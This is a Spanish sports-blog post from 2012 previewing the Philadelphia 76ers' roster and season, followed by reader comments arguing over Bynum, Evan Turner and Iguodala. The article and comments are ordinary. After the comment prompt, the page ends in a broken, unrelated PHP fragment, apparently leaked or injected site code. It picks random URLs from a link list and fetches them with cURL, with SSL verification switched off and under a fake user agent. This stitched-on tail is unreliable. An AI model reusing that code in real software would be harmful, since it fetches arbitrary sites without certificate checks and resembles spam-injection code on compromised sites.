Philadelphia 76ers: Buen trabajo

25 de October de 2012 por Viva_Dirk

Los dirigentes de los Sixers han completado una buena labor este verano, cumpliendo algunas de las peticiones que se llevaba recibiendo desde hace tiempo desde varios frentes, incluido este blog. El núcleo duro de lo que deben ser los Sixers en los próximos años está compuesto por jugadores de entre 21 y 27 años. Sin duda faltan cosas por hacer, pero una vez comprobado el trabajo llevado a cabo estos últimos meses se puede decir que la franquicia está por la labor de mejorar y no quedarse en lo que tienen. El plan pasa sí o sí por convencer a Andrew Bynum de que renueve con ellos al final de esta temporada. Pero antes de pensar en el futuro vamos con el análisis por puestos.

Jrue Holiday completó una campaña absolutamente decepcionante el año pasnado. Tras un segundo año brillante vimos como bajaba en todos los campos estadísticos sin motivo aparente. Esta campaña se antoja decisiva para su proyección en la liga. No hay que olvidar que va a comenzar su cuarta temporada sin haber cumplido 22 años, algo a tener en cuenta ya que sus virtudes naturales están algo reñidas con ‘lo que da la experiencia’. Si juntamos ambas facetas tenemos un base de gran nivel, si no uno bastante mediocre. No hay un base suplente de garantías, ya que Royal Ivey es uno de los jugadores mas insustanciales de la historia de la liga y el rookie Wayns lo tiene todo por demostrar. 

Tengo dudas de quien partirá como escolta titular y finalmente me decido por el veterano Jason Richardson. No pinta demasiado en este proyecto pero no deja de ser una pieza válida si él quiere. Siempre ha sido un buen finalizador y debe abrir el campo de manera eficaz para resultar útil. Dinamita tienen con Nick Young como revulsivo desde el banco. Llega para suplir la baja de Louis Williams pero no le va a resultar fácil. Young es un anotador mucho más unidimensional que Williams y aún peor defensor. Por suerte, sus defectos están cubiertos por otros y así que puede dedicarse a lo que sabe hacer.

El gran beneficiado de los movimientos veraniegos es Evan Turner, el cual alternará posiciones de escolta y alero segun le acompañe en las alas. En realidad su posición teórica es lo de menos ya que su misión es la de llevar el peso de los ataques, decidir por unos compañeros que no son las inteligencia baloncestística en persona. Este año Turner debe demostrar porqué fue elegido en el Nº2 por delante de Cousins o Monroe. Si no es su año difícilmente podremos encontrar excusas. Dorrell Wright completa unas alas de gran caudal ofensivo desde el banco. Tan unidimensional como Young también puede gozar de muchos tiros abiertos.

El juego interior se ve modificado por la llegada de Andrew Bynum, y eso nos lleva a colocar como teórico ala-pivot titular a Spencer Hawes, una de las sensaciones del inicio de la temporada pasada. Debe formar una gran pareja reboteadora e intimidadora con Bynum y aprovechar su buen lanzamiento de media distancia cuando las defensas se cierren. Thaddeus Young ocupará por igual posiciones de 3 y 4. Un gran suplente imparable a campo abierto y muy agresivo en ambos lados de la pista, características que le hacen un gran acompañante para los grandes nombres del equipo.

Andrew Bynum debe ser un factor diferencial en la conferencia Este con Howard ocupando su lugar en los Lakers. Tras su explosión definitiva la campaña pasada no podemos esperar menos de Bynum en un equipo donde va a ser la primera referencia ofensiva y donde la otra estrella es un jugador que no suele asumir una gran cantidad de tiros. No hay que olvidar que es su último año de contrato. Lavoy Allen tuvo un buen papel en los play-offs y parece el tipo de jugador que siempre suma y difícilmente resta, un currante. Kwame Brown y Arnett Moultrie no deberían contar con demasiados minutos, el primero por ser un paquete y el segundo por ser rookie.

A los mandos de todo esto tenemos a Doug Collins que en los últimos años ha manejado muy bien las piezas que tenía. Este año con una configuración distinta veremos si puede poner las bases de un equipo aspirante.

Quinteto: Jrue Holiday – Jason Richardson – Evan Turner – Spencer Hawes – Andrew Bynum
Sexto hombre: Thaddeus Young

Pronóstico: 42-47 victorias, 5º-7º de conferencia y primera ronda de play-offs.

Comenta

12 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    “el primero por ser un paquete” jajajaja.

    Gran análisis, muy ilustrativo ya que algunos estábamos un poco descolocados/desinformados ultimamente con los de Philly.
    Para mí han sido los claros ganadores del verano ya que perdieron a un tipo normalito como Iguodala y ganaron al que, en mi opinión, es el center más completo del campeonato (no digo que el mejor, ojo). Si Bynum es capaz de ejercer un liderazgo real, no sólo en la cancha sino también en el vestuario (que es lo que más dudas me genera) cuidadito con estos chavales

      Citar

  2. GreenPride dice:
    #2

    ¿El equipo con más futuro de la conferencia Este? En principio parecen tener mimbres para serlo a poco que hagan bien las cosas y sobre todo que impliquen y renueven a Bynum.
    Este debe ser el año de muchos de sus jugadores.
    Jrue Holiday es un base de grandes condiciones que debería dar un paso adelante en este equipo. Nivel tiene para ello y su asentamiento va a ser clave para estos Sixers.
    Evan Turner está ante su gran oportunidad. La franquicia ha decidido apostar claramente por él y le han quitado del medio a todo un All-Star como Iguodala que le quitaba minutos y protagonismo. Ahora es el momento de que él demuestre que tiene las condiciones para que nadie se acuerde de Iggy. Año decisivo para él.
    El otro que se encuentra ante su gran año es Bynum. Tras su explosión como gran arma ofensiva del año pasado ahora va a ser el que lleve la voz cantante y la cara ofensiva de la franquicia de Philadelphia. Todos sabemos de su mala cabeza pero está en año de fin de contrato por lo que se le espera muy motivado y atento a hacer su gran año. De momento empieza mal pues no ha podido aún debutar y ya se duda de su participación en los primeros partidos de la regular. Sin duda es el hombre clave de los Sixers de este año. Si explota definitivamente y muestra ganas de jugar al máximo muchos (entre los que me encuentro) creemos que puede ser el mejor pivot de la liga. Ahora le queda demostrarlo y que las lesiones no le lastren.
    A parte de estos tres talentos jóvenes que son la clave del equipo hay buenos mimbres a su alrededor. Un veteranazo como Richardson que si las cosas van bien y se sube al carro puede ser importante y varios anotadores que pueden forrarse si Bynum atrae las defensas como Nick Young o Dorrel Wright. Specenr Hawes puede ser una pieza de mucho valor aprovechando la atención que atraerá su nuevo compañero en la pintura y Thaddeus Young debe ser el líder del banco aportando su físico, defensa y rebote.
    Collins deberá convencerles de que hay que defender a muerte si se quiere hacer algo en la NBA y dotarles de un ataque más fluido que años precedentes ahora que parece tener jugadores para ello.
    Pueden ser uno de los equipos que anime el cotarro en el Este y de primeras sólo les veo inferiores a Heat y Celtics. Si las cosas van bien podrían incluso luchar por el tercer lugar de su conferencia y optar a jugar las semifinales como hicieron el año pasado. Equipo muy interesante y de los que tengo ganas de ver este año

      Citar

  3. txusma dice:
    #3

    Cuando se habla de “la otra estrella” en el apartado de Bynum se refiere a Evan Turner? Antes necesito verlo para creerlo. Yo creo que la otra estrella de este equipo será Holiday que en la NBA ha demostrado el doble que Turner a pesar de habernos dejado una temporada un tanto decepcionante para lo q se esperaba. Creo que Iguodala tapaba a los 2 y su traspaso es un gran acierto. Esta pareja más Bynum pueden dar años de alegría.
    Eso sí, llamar normalito a Iguodala… pues tampoco

      Citar

  4. Esteban dice:
    #4

    comparto el analisis, pero a no perder de vista la pretemporada de EVAN TURNER, que esta siendo minimamente penosa, con unos promedios que asustan de 9.2 ppp en 27.6 mmm

    por el pasara la temporada, si puede transformarse en un segunda espada capaz de estar en los 20 ppp y ser all-star, BYNUM confiara en el proyecto y renovara, de hacerlo mal, por mas que el equipo entre a PO, Andrew no vera motivos para quedarse

    por mi parte he visto cosas muy muy buenas de turner, y siempre en PO ridnio mas que en la regular, lo que lo hace un jugador a tener en cuenta, pero habra q ver como lleva el peso de ser la referencia en sus espaldas

      Citar

  5. HisRoyalAirness dice:
    #5

    txusma:
    Cuando se habla de “la otra estrella” en el apartado de Bynum se refiere a Evan Turner? Antes necesito verlo para creerlo. Yo creo que la otra estrella de este equipo será Holiday que en la NBA ha demostrado el doble que Turner a pesar de habernos dejado una temporada un tanto decepcionante para lo q se esperaba. Creo que Iguodala tapaba a los 2y su traspaso es un gran acierto. Esta pareja más Bynum pueden dar años de alegría.
    Eso sí, llamar normalito a Iguodala… pues tampoco

    Pues a mí me parece normalito en general Txus… un gran defensor, tirador competente y poco más. En la Conferencia Oeste no hubiera sido All-Star en su p*ta vida.
    Pero es mi opinión, para gustos…

      Citar

  6. txusma dice:
    #6

    Qué queda por debajo de normalito? Paquete? Muchos paquetes hay en la NBA entonces…

    A gran defensor (excelso diría yo) te ha faltado añadir gran distribuidor. Un Point-Forward de verdad. Cierto es que el tiro no es lo suyo pero vaya que yo lo preferiría en mi equipo por delante de otras que van más de estrellitas. Eso sí, siempre que no tenga que acaparar él toda la producción anotadora.

      Citar

  7. Jose Luis dice:
    #7

    @Esteban: con unos promedios que asustan de 9.2 ppp en 27.6 mmm

    jajajaja si puntos es ppp, minutos es mmm no? me ha hecho gracia 😀 no obstante, es una pretemporada bastante mala, a este chico le cuesta mucho anotar…

      Citar

  8. Esteban dice:
    #8

    Jose Luis:
    @Esteban: con unos promedios que asustan de 9.2 ppp en 27.6 mmm

    jajajaja si puntos es ppp, minutos es mmm no? me ha hecho gracia no obstante, es una pretemporada bastante mala, a este chico le cuesta mucho anotar…

    Ahora no recuerdo si quise por mmmmmmm como duda, o mmm minutos mugados martidos jajajajajajaja

      Citar

  9. HisRoyalAirness dice:
    #9

    txusma:
    Qué queda por debajo de normalito? Paquete? Muchos paquetes hay en la NBA entonces…

    A gran defensor (excelso diría yo) te ha faltado añadir gran distribuidor. Un Point-Forward de verdad. Cierto es que el tiro no es lo suyo pero vaya que yo lo preferiría en mi equipo por delante de otras que van más de estrellitas. Eso sí, siempre que no tenga que acaparar él toda la producción anotadora.

    No, no me refería a que normalito fuese lo siguiente a paquete. Normalito en comparación con la élite.
    Me parece un excelente complemento, nunca un primer ni segunda espada. Tiene buena visión de juego, sí pero jamás le dejaría llevar la batuta en mi equipo.
    No me entusiasma, tampoco te voy a engañar, pero por supuesto que lo prefiero antes que a muchos que van de estrellitas

      Citar

  10. txusma dice:
    #10

    HisRoyalAirness: No, no me refería a que normalito fuese lo siguiente a paquete. Normalito en comparación con la élite.
    Me parece un excelente complemento, nunca un primer ni segunda espada. Tiene buena visión de juego, sí pero jamás le dejaría llevar la batuta en mi equipo.
    No me entusiasma, tampoco te voy a engañar, pero por supuesto que lo prefiero antes que a muchos que van de estrellitas

    Vamos, q venimos a decir lo mismo. A mi me gustan los tíos que bajan el culo y se ponen a defender. Todo mi respeto para los Kobe, Paul, Garnett, etc… por encima de los Stoudamire de la vida.

      Citar

  11. HisRoyalAirness dice:
    #11

    txusma: Vamos, q venimos a decir lo mismo. A mi me gustan los tíos que bajan el culo y se ponen a defender. Todo mi respeto para los Kobe, Paul, Garnett, etc… por encima de los Stoudamire de la vida.

    Hombre, dónde va a parar!!

    Los grandes jugadores que además son excelsos defensorer (como los que dices) tienen mi más absoluto respeto. De ahí mi debilidad por Hakeem por encima de otros pivots de leyenda

      Citar

  12. Sancho88 dice:
    #12

    Pues muy de acuerdo Viva. Creo que estarán por encima de las 45 victorias y que en el Este se pueden pasear tranquilamente con partidos de orinal y pijama, a 80 puntos y a dormir al personal. Tienen defensa, aunque este año les costará un poco más, pues creo que has obviado algo importante en el análisis, y es la salida de Iggy y Brand. Estos dos jugadores les daban todo atrás, y luego con los pequeñines resolvían ofensivamente. A ver cómo se desenvuelve Bynum como jugador franquicia. Tengo muchas dudas de si le van a poder arropar bien, de su liderazgo, etc. Como bien dices, son jóvenes y muchos pecarán de inexperiencia. Este año no pasarán de primera ronda ni de coña, y veo a Turner postulando al MIP segurísimo. Y parece que J-Rich está bastante enchufadete. Si pueden conseguir que juegue al cincuenta por ciento de lo que fue, con los dos Youngs saliendo desde el banquillo, el propio Wright, que también se ha marcado una buena pretemporada, Allen, etc… pueden ser clase media-alta del Este. No obstante, y dicho todo esto, el equipo tufa a aburrimiento que echa para atrás. Vamos, no creo que nadie se mate por ver a estos Sixers, más allá del morbo por saber qué puede hacer Bynum como jugador franquicia, cuántas mandarinas se tirarán entre Nicky, Holiday y Turner, y si el propio Turner se convierte en un hombre o no.

    Turner o George. Con quién os quedariais vosotros? Yo por potencial con Turner, por presente con George

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>